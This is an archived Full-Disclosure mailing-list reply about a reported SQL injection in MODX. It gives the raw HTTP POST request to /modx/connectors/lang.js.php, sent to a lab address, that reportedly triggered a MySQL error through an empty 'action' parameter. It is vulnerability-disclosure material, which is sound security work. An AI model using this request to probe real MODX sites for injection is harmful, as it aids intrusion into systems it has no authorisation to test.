| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAOJKFBBW4Bx3dEamNUWEPro-__iTk2sXWYy3yn0S_LAM6SPhwA@mail.gmail.com>
Date: Sun, 9 Mar 2014 09:22:25 -0500
From: Brandon Perry <bperry.volatile@...il.com>
To: Peter W <pwilhelmsen@...ptoslogic.com>,
"full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Re: SQL injection in MODX
1 POST /modx/connectors/lang.js.php HTTP/1.1
2 Host: 192.168.1.70
3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
4 Accept: */*
5 Accept-Language: en-US,en;q=0.5
6 Accept-Encoding: gzip, deflate
7 Referer: http://192.168.1.70/modx/manager/
8 Cookie: PHPSESSID=v2pnqigca0qfr835vimrknh1k0
9 Connection: keep-alive
10 Content-Length: 64
11
12 ctx=mgr&topic=topmenu,file,resource,welcome,configcheck&action=
Haven't worked on it at all since the initial look through.
On Sun, Mar 9, 2014 at 5:39 AM, Peter W <pwilhelmsen@...ptoslogic.com>wrote:
> Hello Brandon,
>
> Thank you for some interesting posts on the Full Disclosure mailing lists.
>
> Your analysis of the bug is very interesting and I would like to
> investigate this issue further.
>
> Could you show me what kind of requests you made to trigger the MySQL
> error?
>
> Thank for you time.
>
> Best regards, Peter
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists